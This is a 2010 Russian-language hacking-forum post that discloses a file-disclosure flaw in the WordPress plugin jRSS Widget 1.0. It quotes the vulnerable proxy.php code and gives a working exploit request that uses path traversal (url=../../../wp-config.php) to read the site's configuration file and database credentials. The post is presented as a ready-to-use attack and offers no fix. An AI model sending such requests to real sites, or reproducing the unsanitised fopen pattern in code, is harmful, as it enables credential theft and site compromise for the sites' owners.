30.05.2010, 12:32
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
WordPress Plugin [jRSS Widget] File Disclosure Vulnerability
Plugin name: jRSS Widget ( download)
Version: 1.0
File Disclosure
Vuln file: /wp-content/plugins/jrss-widget/proxy.php
PHP код:
header('Content-type: application/xml');
$handle = fopen($_REQUEST['url'], "r");
if ( $handle ) {
while ( !feof($handle) ) {
$buffer = fgets($handle, 4096);
echo $buffer;
}
fclose($handle);
}
Exploit:
Код:
POST http://[host]/[path]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
url=../../../wp-config.php
__________________
Avant que l'ombre...
Последний раз редактировалось RulleR; 30.05.2010 в 12:34..
|
|
|